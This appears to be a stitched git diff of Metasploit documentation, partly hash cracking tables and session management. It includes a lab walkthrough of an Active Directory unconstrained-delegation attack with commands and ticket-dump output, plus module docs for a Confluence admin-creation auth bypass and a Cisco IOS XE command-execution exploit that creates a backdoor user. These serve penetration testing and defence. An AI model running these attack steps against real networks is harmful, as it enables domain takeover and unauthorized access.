| Oracle 11 | DEMO | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Oracle 11 | oracle11_epsilon | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Oracle 12 | oracle12_epsilon | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B` | epsilon | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Postgres | example | `md5be86a79bf2043622d58d5453c47d4860` | password | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Android (Samsung) SHA1 | samsungsha1 | `D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1` | 1234 | android-samsung-sha1 | post/android/gather/hashdump | modules/auxiliary/analyze/crack_mobile |
|
||||
| Android (non-Samsung) SHA1 | androidsha1 | `9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5` | 1234 | android-sha1 | post/android/gather/hashdump | modules/auxiliary/analyze/crack_mobile |
|
||||
| Android MD5 | androidmd5 | `1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5` | 1234 | android-md5 | post/android/gather/hashdump | modules/auxiliary/analyze/crack_mobile |
|
||||
| OSX 10.4-10.6 | xsha_hashcat | `1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683` | hashcat | xsha | post/osx/gather/hashdump | modules/auxiliary/analyze/crack_osx |
|
||||
| OSX 10.8+ | pbkdf2_hashcat | `$ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f9$` | hashcat | PBKDF2-HMAC-SHA512 | post/osx/gather/hashdump | modules/auxiliary/analyze/crack_osx |
|
||||
| OSX 10.7 | xsha512_hashcat | `648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d` | hashcat | xsha512 | post/osx/gather/hashdump | modules/auxiliary/analyze/crack_osx |
|
||||
| HMAC-MD5 | hmac_password | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9` | password | hmac-md5 | auxiliary/server/capture/smtp | |
|
||||
| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6` | TestPass123# | dynamic_82 | | |
|
||||
| MediaWiki | mediawiki_hashcat | `$B$56668501$0ce106caa70af57fd525aeaf80ef2898` | hashcat | mediawiki | | modules/auxiliary/analyze/crack_webapps |
|
||||
| PHPPass (P type) | phpass_p_hashcat | `$P$984478476IagS59wHZvyQMArzfx58u.` | hashcat | phpass | | modules/auxiliary/analyze/crack_webapps |
|
||||
| PHPPass (H type) | phpass_h_hashcat | `$H$984478476IagS59wHZvyQMArzfx58u.` | hashcat | phpass | | modules/auxiliary/analyze/crack_webapps |
|
||||
| Atlassian | atlassian_hashcat | `{PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa` | hashcat | PBKDF2-HMAC-SHA1 | | modules/auxiliary/analyze/crack_webapps |
|
||||
|
||||
# Adding a New Hash
|
||||
|
||||
Only hashes which were found in Metasploit were added to the hash id library, and the other functions. New hashes are developed often, and new modules which find a new type of hash will most definitely be created. So what are the steps to add a new hash type to Metasploit?
|
||||
|
||||
1. Add a new identify algorithm to: [framework/hashes/identify.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/hashes/identify.rb). You may want to consult external programs such as `hashid` or `hash-identifier` for suggestions.
|
||||
1. Add a new identify algorithm to: [framework/hashes.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/hashes.rb). You may want to consult external programs such as `hashid` or `hash-identifier` for suggestions.
|
||||
1. Add the hash to the spec to ensure it works right now, and in future updates: [framework/hashes/identify_spec.rb](https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/metasploit/framework/hashes/identify_spec.rb)
|
||||
1. Make sure the hashes are saved in the DB in the JTR format. A good source to identify what the hashes look like is [pentestmonkey](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats).
|
||||
1. If applicable, add it into the appropriate cracker module (or create a new one). Example for [Windows related hashes](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/analyze/crack_windows.rb).
|
||||
|
||||
@@ -0,0 +1,62 @@
|
||||
## Sessions Command
|
||||
|
||||
### Session Search
|
||||
|
||||
When you have a number of sessions open, searching can be a useful tool to navigate them. This guide explains what capabilities are available for navigating open sessions with search.
|
||||
|
||||
You can get a list of sessions matching a specific criteria within msfconsole:
|
||||
|
||||
```msf
|
||||
msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_id:2"
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
1 meterpreter x86/windows WIN-ED9KFH65RDH\Zach Goldman @WIN-ED9KFH65RDH 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132)
|
||||
|
||||
```
|
||||
|
||||
Currently, the only supported keywords for search are `session_id`, `session_type`, and `last_checkin`. These keywords can be combined to further filter your results, and used with other flags. For example:
|
||||
|
||||
```msf
|
||||
msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_type:meterpreter last_checkin:greater_than:10s last_checkin:less_than:10d5h2m30s" -v
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Session ID: 1
|
||||
Name:
|
||||
Type: meterpreter windows
|
||||
Info: WIN-ED9KFH65RDH\Zach Goldman @ WIN-ED9KFH65RDH
|
||||
Tunnel: 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132)
|
||||
Via: exploit/multi/handler
|
||||
Encrypted: Yes (AES-256-CBC)
|
||||
UUID: 958f7b976db67d60/x86=1/windows=1/2023-10-19T12:38:05Z
|
||||
CheckIn: 21725s ago @ 2023-10-19 09:26:08 -0500
|
||||
Registered: No
|
||||
|
||||
```
|
||||
|
||||
Of note in the above example, `last_checkin` requires an extra argument. The second argument must be either `greater_than` or `less_than`. The third argument can be a sequence of alternating amounts and units of time (d: days, h: hours, m: minutes, and s: seconds), i.e. `5m2s`, `10d`, or `1d5m`.
|
||||
|
||||
### Killing stale sessions
|
||||
|
||||
If `--search` is used in conjunction with `--kill-all`, it will restrict the latter function to only the search results. For example:
|
||||
|
||||
```msf
|
||||
msf6 payload(windows/meterpreter/reverse_http) > sessions -K -S "session_type:meterpreter"
|
||||
[*] Killing matching sessions...
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
1 meterpreter x86/windows WIN-ED9KFH65RDH\Zach Goldman @ WIN-ED9KFH65RDH 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132)
|
||||
2 meterpreter x86/windows WIN-ED9KFH65RDH\Zach Goldman @ WIN-ED9KFH65RDH 192.168.2.1:4444 -> 192.168.2.132:52192 (192.168.2.132)
|
||||
|
||||
[*] 192.168.2.132 - Meterpreter session 1 closed.
|
||||
[*] 192.168.2.132 - Meterpreter session 2 closed.
|
||||
msf6 payload(windows/meterpreter/reverse_http) >
|
||||
```
|
||||
@@ -24,7 +24,7 @@ Metasploit has support for multiple SMB modules, including:
|
||||
There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
|
||||
|
||||
```msf
|
||||
msf6 > search mysql
|
||||
msf6 > search smb
|
||||
```
|
||||
|
||||
### Lab Environment
|
||||
|
||||
@@ -41,3 +41,18 @@ These are just suggestions, but it'd be nice if the KB had these sections:
|
||||
- **Verification Steps** - Tells users how to use the module and what the expected results are from running the module.
|
||||
- **Options** - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required.
|
||||
- **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module.
|
||||
|
||||
### Before you submit your PR: msftidy_docs.rb
|
||||
|
||||
A documentation file can be passed as a positional argument to `metasploit-framework/tools/dev/msftidy_docs.rb` and will
|
||||
highlight formatting errors the docs file might contain. Once all the errors and warnings thrown by `msftidy_docs.rb` have
|
||||
been resolved, the documentation file is ready for submission.
|
||||
|
||||
```
|
||||
➜ metasploit-framework git:(upstream-master) ✗ ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/panos_op_cmd_exec.md
|
||||
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [INFO] Missing Section: ## Options
|
||||
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] Please add a newline at the end of the file
|
||||
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps/Module usage, Options, Scenarios
|
||||
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:50 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
|
||||
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:53 - [WARNING] Spaces at EOL
|
||||
```
|
||||
@@ -130,11 +130,13 @@ Required options:
|
||||
* `${Prefix}::Rhostname` -- The hostname of the target system. This value should be either the hostname `WIN-MIJZ318SQH` or
|
||||
the FQDN like `WIN-MIJZ318SQH.msflab.local`. i.e. `Smb::Rhostname=WIN-MIJZ318SQH.msflab.local`
|
||||
* `${Prefix}Domain` -- The domain name of the target system, e.g. `msflab.local`. i.e. `SmbDomain=msflab.local`
|
||||
* `DomainControllerRhost` -- The IP address of the domain controller to use for kerberos authentication. i.e. `DomainControllerRhost=192.168.123.13`
|
||||
|
||||
Optional options:
|
||||
* `DomainControllerRhost` -- The IP address or hostname of the domain controller to use for Kerberos authentication.
|
||||
i.e. `DomainControllerRhost=192.168.123.13`. If this value is not specified, Metasploit will look it up via the
|
||||
realm's (the `${Prefix}Domain` option) SRV record in DNS.
|
||||
* `${Prefix}::Krb5Ccname` -- The path to a CCACHE file to use for authentication. This is comparable to setting the
|
||||
`KRB5CCNAME` environment variable for other tools. If specified, the tickets it contains will be used. i.e. `KRB5CCNAME=/path/to/Administrator.ccache`
|
||||
`KRB5CCNAME` environment variable for other tools. If specified, the tickets it contains will be used. i.e. `KRB5CCNAME=/path/to/Administrator.ccache`.
|
||||
* `KrbCacheMode` -- The cache storage mode to use, one of the following four options:
|
||||
* `none` -- No cache storage is used, new tickets are requested and no tickets are stored.
|
||||
* `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
|
||||
|
||||
@@ -0,0 +1,226 @@
|
||||
# Unconstrained Delegation Exploitation
|
||||
|
||||
If a computer account is configured for unconstrained delegation, and an attacker has administrative access to it then
|
||||
the attacker can leverage it to compromise the Active Directory domain.
|
||||
|
||||
## Lab setup
|
||||
|
||||
For this attack to work there must be a computer account (workstation or server) in the active directory domain that has
|
||||
been configured for unconstrained delegation.
|
||||
|
||||
On the domain controller:
|
||||
|
||||
1. Open "Active Directory Users and Computers"
|
||||
2. Navigate to the computer account, right click and select "Properties"
|
||||
3. In the "Delegation" tab, select "Trust this computer for delegation to any service (Kerberos only)"
|
||||
|
||||
On the target computer:
|
||||
|
||||
1. Force an update of group policy by running `gpupdate /force`
|
||||
2. Reboot the computer
|
||||
|
||||
## Attack Workflow
|
||||
|
||||
This attack assumes that the attacker has:
|
||||
|
||||
1. The IP address of the domain controller.
|
||||
2. The active directory domain name.
|
||||
3. A compromised domain account (no special privileges are necessary).
|
||||
4. The ability to fully compromise a target system through some means.
|
||||
5. (Optional but recommended) Metasploit running with an attached database so the Kerberos ticket cache can be used.
|
||||
Verify this using the `db_status` command.
|
||||
|
||||
At a high-level the summary to leverage this attack chain is:
|
||||
|
||||
1. Identify a target computer account configured with unconstrained delegation.
|
||||
2. Compromise that target computer account to open a Meterpreter session with administrative privileges (SYSTEM works).
|
||||
3. Coerce authentication to the compromised target from a domain controller.
|
||||
4. Dump the Kerberos tickets from the compromised targets to obtain a TGT from the domain controller's computer account.
|
||||
5. Use the TGT to authenticate to the domain controller as itself (the computer account).
|
||||
|
||||
### Target Identification
|
||||
The unconstrained delegation setting is stored as a bit flag in the `userAccountControl` LDAP attribute. A domain
|
||||
account can be used with the `auxiliary/gather/ldap_query` module to identify computer accounts configured for
|
||||
unconstrained delegation. Note that by default domain controllers themselves are configured for unconstrained delegation
|
||||
and should be ignored as targets.
|
||||
|
||||
Use the `ENUM_UNCONSTRAINED_DELEGATION` action to enumerate targets:
|
||||
```
|
||||
msf6 > use auxiliary/gather/ldap_query
|
||||
msf6 auxiliary(gather/ldap_query) > set RHOSTS 192.168.159.10
|
||||
RHOSTS => 192.168.159.10
|
||||
msf6 auxiliary(gather/ldap_query) > set DOMAIN msflab.local
|
||||
DOMAIN => msflab.local
|
||||
msf6 auxiliary(gather/ldap_query) > set USERNAME aliddle
|
||||
USERNAME => aliddle
|
||||
msf6 auxiliary(gather/ldap_query) > set PASSWORD Password1!
|
||||
PASSWORD => Password1!
|
||||
msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_UNCONSTRAINED_DELEGATION
|
||||
ACTION => ENUM_UNCONSTRAINED_DELEGATION
|
||||
msf6 auxiliary(gather/ldap_query) > run
|
||||
[*] Running module against 192.168.159.10
|
||||
|
||||
[*] Discovering base DN automatically
|
||||
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
|
||||
[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local
|
||||
CN=WS01 CN=Computers DC=msflab DC=local
|
||||
=======================================
|
||||
|
||||
Name Attributes
|
||||
---- ----------
|
||||
cn WS01
|
||||
objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local
|
||||
samaccountname WS01$
|
||||
|
||||
CN=DC OU=Domain Controllers DC=msflab DC=local
|
||||
==============================================
|
||||
|
||||
Name Attributes
|
||||
---- ----------
|
||||
cn DC
|
||||
memberof CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=msflab,DC=local || CN=Cert Publishers,CN=Users,DC=msflab,DC=local
|
||||
objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local
|
||||
samaccountname DC$
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(gather/ldap_query) >
|
||||
```
|
||||
|
||||
This results in two potential targets, WS01 and DC. Next, use the `ENUM_DOMAIN_CONTROLLERS` action to identify the
|
||||
domain controllers to remove from the list of potential targets.
|
||||
|
||||
```
|
||||
msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_DOMAIN_CONTROLLERS
|
||||
ACTION => ENUM_DOMAIN_CONTROLLERS
|
||||
msf6 auxiliary(gather/ldap_query) > run
|
||||
[*] Running module against 192.168.159.10
|
||||
|
||||
[*] Discovering base DN automatically
|
||||
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
|
||||
[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local
|
||||
CN=DC OU=Domain Controllers DC=msflab DC=local
|
||||
==============================================
|
||||
|
||||
Name Attributes
|
||||
---- ----------
|
||||
distinguishedname CN=DC,OU=Domain Controllers,DC=msflab,DC=local
|
||||
dnshostname DC.msflab.local
|
||||
name DC
|
||||
operatingsystem Windows Server 2019 Standard
|
||||
operatingsystemversion 10.0 (17763)
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(gather/ldap_query) >
|
||||
```
|
||||
|
||||
This shows that DC is a domain controller and should be removed from the list, leaving WS01 as the only viable target.
|
||||
|
||||
### Exploitation
|
||||
Now the WS01 system needs to be compromised through some means to obtain a Meterpreter session. Once a Meterpreter
|
||||
session has been obtained, the Domain Controller needs to be coerced into authenticating to the target. The
|
||||
`auxiliary/scanner/dcerpc/petitpotam` module can be used for this purpose. Use the module, and take care to set the
|
||||
`LISTENER` option to **the hostname of the compromised host**. The hostname must be used and not an IP address. Set the
|
||||
remaining options including `RHOSTS` to the domain controller, and `SMBUser` / `SMBPass` to the credentials of the
|
||||
compromised domain account.
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/scanner/dcerpc/petitpotam
|
||||
msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER ws01.msflab.local
|
||||
LISTENER => ws01.msflab.local
|
||||
msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBUser aliddle
|
||||
SMBUser => aliddle
|
||||
msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBPass Password1!
|
||||
SMBPass => Password1!
|
||||
msf6 auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.168.159.10
|
||||
RHOSTS => 192.168.159.10
|
||||
msf6 auxiliary(scanner/dcerpc/petitpotam) > run
|
||||
|
||||
[+] 192.168.159.10:445 - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
|
||||
[*] 192.168.159.10:445 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(scanner/dcerpc/petitpotam) >
|
||||
```
|
||||
|
||||
If the module does not indicate that the attack was successful, another tool like
|
||||
[`Coercer`](https://github.com/p0dalirius/Coercer) can be used to try additional methods.
|
||||
|
||||
Now that the domain controller has authenticated to the target it's necessary to dump the kerberos tickets from the
|
||||
compromised target. Use the `post/windows/manage/kerberos_tickets` module and the `DUMP_TICKETS` action to dump the TGTs
|
||||
from the compromised host. If the attack was successful there should be at least one TGT from the domain controller's
|
||||
computer account.
|
||||
|
||||
```
|
||||
msf6 > use post/windows/manage/kerberos_tickets
|
||||
msf6 post(windows/manage/kerberos_tickets) > set SESSION -1
|
||||
SESSION => -1
|
||||
msf6 post(windows/manage/kerberos_tickets) > set SERVICE krbtgt/*
|
||||
SERVICE => krbtgt/*
|
||||
msf6 post(windows/manage/kerberos_tickets) > run
|
||||
|
||||
[*] LSA Handle: 0x000001efe1c415a0
|
||||
[*] LogonSession LUID: 0x00004bc1d
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:33:17 -0400
|
||||
[*] Ticket[0]
|
||||
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823151727_default_192.168.159.10_mit.kerberos.cca_488233.bin
|
||||
Primary Principal: DC$@MSFLAB.LOCAL
|
||||
Ccache version: 4
|
||||
|
||||
Creds: 1
|
||||
Credential[0]:
|
||||
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
|
||||
Client: DC$@MSFLAB.LOCAL
|
||||
Ticket etype: 18 (AES256)
|
||||
Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0
|
||||
Subkey: false
|
||||
Ticket Length: 1006
|
||||
Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE)
|
||||
Addresses: 0
|
||||
Authdatas: 0
|
||||
Times:
|
||||
Auth time: 1969-12-31 19:00:00 -0500
|
||||
Start time: 2023-08-23 08:33:17 -0400
|
||||
End time: 2023-08-23 18:33:17 -0400
|
||||
Renew Till: 2023-08-30 08:33:17 -0400
|
||||
Ticket:
|
||||
Ticket Version Number: 5
|
||||
Realm: MSFLAB.LOCAL
|
||||
Server Name: krbtgt/MSFLAB.LOCAL
|
||||
Encrypted Ticket Part:
|
||||
Ticket etype: 18 (AES256)
|
||||
Key Version Number: 2
|
||||
Cipher:
|
||||
L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw==
|
||||
[*] LogonSession LUID: 0x00001052b
|
||||
[*] User: Window Manager\DWM-1
|
||||
[*] Session: 1
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Interactive (2)
|
||||
[*] LogonTime: 2023-08-23 08:32:38 -0400
|
||||
|
||||
... omitted for brevity ...
|
||||
```
|
||||
|
||||
In this case, a TGT for the `MSFLAB\DC$` account was obtained through the logon session with LUID `0x00004bc1d`. The
|
||||
ticket was stored to disk in a ccache file. The ticket can also be seen in the output of `klist`.
|
||||
|
||||
```
|
||||
msf6 post(windows/manage/kerberos_tickets) > klist
|
||||
Kerberos Cache
|
||||
==============
|
||||
id host principal sname issued status path
|
||||
-- ---- --------- ----- ------ ------ ----
|
||||
411 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823151744_default_192.168.159.10_mit.kerberos.cca_307418.bin
|
||||
407 192.168.159.10 WS01$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 15:14:46 -0400 active /home/smcintyre/.msf4/loot/20230823151735_default_192.168.159.10_mit.kerberos.cca_760842.bin
|
||||
|
||||
msf6 post(windows/manage/kerberos_tickets) >
|
||||
```
|
||||
|
||||
### Using The Ticket
|
||||
Now that at TGT for the domain controller has been obtained, it can be used in a Pass-The-Ticket style attack whereby
|
||||
the attacker uses it to authenticate to the target. The `auxiliary/gather/windows_secrets_dump` module is a good one to
|
||||
use for this purpose as it will yield additional accounts while avoiding running any kind of payload on the domain
|
||||
controller.
|
||||
+9
-1
@@ -186,7 +186,11 @@ NAVIGATION_CONFIG = [
|
||||
},
|
||||
{
|
||||
path: '../../documentation/modules/auxiliary/admin/ldap/rbcd.md',
|
||||
title: 'RBCD - Resource-based constrained delegation'
|
||||
title: 'Resource-based constrained delegation (RBCD)'
|
||||
},
|
||||
{
|
||||
path: 'kerberos/unconstrained_delegation.md',
|
||||
title: 'Unconstrained delegation'
|
||||
}
|
||||
]
|
||||
},
|
||||
@@ -272,6 +276,10 @@ NAVIGATION_CONFIG = [
|
||||
{
|
||||
path: 'How-to-use-msfvenom.md',
|
||||
nav_order: 7
|
||||
},
|
||||
{
|
||||
path: 'Managing-Sessions.md',
|
||||
nav_order: 8
|
||||
}
|
||||
]
|
||||
},
|
||||
|
||||
@@ -0,0 +1,51 @@
|
||||
## Vulnerable Application
|
||||
This module exploits an Broken Access Control vulnerability in Atlassian Confluence servers leads to Authentication Bypass.
|
||||
|
||||
A specially crafted request can be create new admin account without authorization in the Atlassian server.
|
||||
|
||||
Affecting Atlassian Confluence from version 8.0.0 to before 8.3.3, from version 8.4.0 before 8.4.3 and from version 8.5.0 before 8.5.2.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Setting up a working installation of Atlassian Confluence Server before 8.0.0
|
||||
2. Start `msfconsole`
|
||||
3. `use use auxiliary/admin/http/atlassian_confluence_auth_bypass`
|
||||
4. `set RHOST <IP>`
|
||||
5. `set RPORT <PORT>`
|
||||
6. `check`
|
||||
7. You should see `The target is vulnerable`
|
||||
8. `set NEW_USERNAME <username>`
|
||||
9. `set NEW_PASSWORD <password>`
|
||||
10. `run`
|
||||
11. You should get a new admin account.
|
||||
|
||||
## Options
|
||||
### TARGETURI
|
||||
Path to Atlassian Confluence installation ("/" is the default)
|
||||
|
||||
### NEW_USERNAME
|
||||
Username to be used when creating a new user with admin privileges. The username must not contain capital letters.
|
||||
|
||||
### NEW_PASSWORD
|
||||
Password to be used when creating a new user with admin privileges.
|
||||
|
||||
### NEW_EMAIL
|
||||
E-mail to be used when creating a new user with admin privileges.
|
||||
|
||||
## Scenarios
|
||||
### Tested on Confluence Server 8.0.0 with Linux target (Ubuntu 20.04)
|
||||
```
|
||||
msf6 > use auxiliary/multi/http/atlassian_confluence_auth_bypass
|
||||
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set RHOSTS <YOUR_TARGET>
|
||||
RHOSTS => <YOUR_TARGET>
|
||||
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_USERNAME admin_1337
|
||||
NEW_USERNAME => admin_1337
|
||||
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_PASSWORD admin_1337
|
||||
NEW_PASSWORD => admin_1337
|
||||
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
|
||||
[*] Running module against <YOUR_TARGET>
|
||||
|
||||
[+] Admin user was created successfully. Credentials: admin_1337 - admin_1337
|
||||
[+] Now you can login as adminstrator from: http://<YOUR_TARGET>:8090/login.action
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,172 @@
|
||||
## Vulnerable Application
|
||||
This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the
|
||||
Web UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15.
|
||||
|
||||
You must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and
|
||||
`global`. To run a command in "Privileged" mode, set the `CMD` option to the command you want to run,
|
||||
e.g. `show version` and set the `MODE` to `privileged`. To run a command in "Global Configuration" mode, set
|
||||
the `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r` and set
|
||||
the `MODE` to `global`.
|
||||
|
||||
The vulnerable IOS XE versions are:
|
||||
|
||||
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
|
||||
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
|
||||
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
|
||||
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
|
||||
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
|
||||
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
|
||||
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
|
||||
